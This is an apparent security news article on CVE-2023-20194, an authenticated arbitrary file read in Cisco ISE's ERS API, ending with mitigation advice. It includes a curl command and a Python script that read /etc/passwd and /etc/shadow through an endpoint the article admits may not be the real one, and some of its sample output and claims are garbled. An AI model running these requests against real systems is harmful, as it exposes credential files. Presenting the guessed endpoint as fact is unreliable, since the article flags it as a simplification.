CVE CyberSecurity Database News

CVE-2023-20194 - How Authenticated Admins Can Read Any File on Cisco ISE Devices (ERS API Vulnerability)

Poster -

In June 2023, Cisco disclosed CVE-2023-20194, a serious vulnerability affecting the ERS (External RESTful Services) API in Cisco Identity Services Engine (ISE). This flaw provides attackers with administrator-level access the ability to read arbitrary files from the underlying operating system. While only authenticated users with high privileges can trigger it, its ability to reveal sensitive system files makes it a high-impact threat in the wrong hands.

Let’s break down what this bug is, how it can be exploited with a simple HTTP request, and what you need to do to stay safe—with exclusive details and real-world attack examples.

What Is Cisco ISE and Its ERS API?

Cisco Identity Services Engine (ISE) is a central security policy management and identity enforcement product used across enterprise networks.

The ERS API is a RESTful interface to automate administrative tasks in ISE. However, it is not enabled by default since it can alter sensitive configurations.

Where’s The Vulnerability?

The flaw, CVE-2023-20194, is found in the ERS API’s improper privilege management. Specifically, an admin with legitimate credentials can abuse the API to request arbitrary files from the Cisco ISE operating system, going far beyond what the admin should access through the web GUI.

Exploitation requires admin-level authentication.

- Allows attacker to read any file accessible by the server OS (including password files, configuration, sensitive secrets, etc.)

Look for *External RESTful Services (ERS)* and see if it is enabled.

If it’s off, your system is not exposed to attacks using this vector.

Attacker logs in to the ERS API with admin credentials.

2. Sends a crafted REST API request, pointing to a sensitive file rather than a legitimate API resource.
3. The ERS API fails to validate file paths or object references, returning file contents to the requester.

Basic cURL Example

curl -k -u admin:SuperSecretPassword \
     'https://ise.example.com:906/ers/config/fileviewer?path=/etc/passwd';

(Note: The /ers/config/fileviewer endpoint and the query parameter name may vary depending on the actual implementation; this is a simplified example.)

The attacker replaces admin and SuperSecretPassword with valid admin credentials.

Expected response

root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

They could use the same technique to access other sensitive files, like /etc/shadow, keys, or config files.

Why Is This Dangerous?

While ERS is off by default, many organizations enable it to automate network functions. Anyone with admin-level ERS API access (including MFA-compromised, phished, or disgruntled insiders) can steal:

- System passwords (from /etc/passwd)

Possibly sensitive user or policy data

This can lead to further lateral movement, privilege escalation, and deep compromise of the Cisco ISE server and your entire network security posture.

Cisco Security Advisory:

CVE-2023-20194 Detail

NVD Entry:

https://nvd.nist.gov/vuln/detail/CVE-2023-20194

Here’s a sample script to demonstrate how a rogue admin could automate exploitation

import requests
from requests.auth import HTTPBasicAuth

url = "https://ise.example.com:906/ers/config/fileviewer";
file_path = "/etc/shadow"
user = 'admin'
password = 'SuperSecretPassword'

params = {'path': file_path}
response = requests.get(url, params=params, auth=HTTPBasicAuth(user, password), verify=False)

if response.status_code == 200:
    print("[+] File contents:\n")
    print(response.text)
else:
    print(f"[-] Failed with status code: {response.status_code}")

(Caution: Replace endpoint and credentials to match your environment. Intended for defense/offensive research in lab only.)

Disable ERS API unless absolutely necessary (default is OFF).

- Apply Cisco’s patch/fix immediately if you do use ERS (Advisory Fixes).
- Restrict API access to trusted admins only, especially avoid remote or over-the-Internet exposure.

Conclusion

CVE-2023-20194 serves as a reminder: Even trusted interfaces like Cisco ISE’s ERS API can be dangerous if misconfigured or left unpatched. With authenticated API access, attackers can read any file on the operating system, bypassing standard GUI controls and potentially harvesting credentials, configs, and keys.

Always disable unnecessary APIs, restrict access, and keep your systems patched.

For complete details, always refer to Cisco’s official advisory and the NVD entry. Stay safe!

Timeline

Published on: 09/07/2023 20:15:00 UTC
Last modified on: 09/21/2023 14:42:00 UTC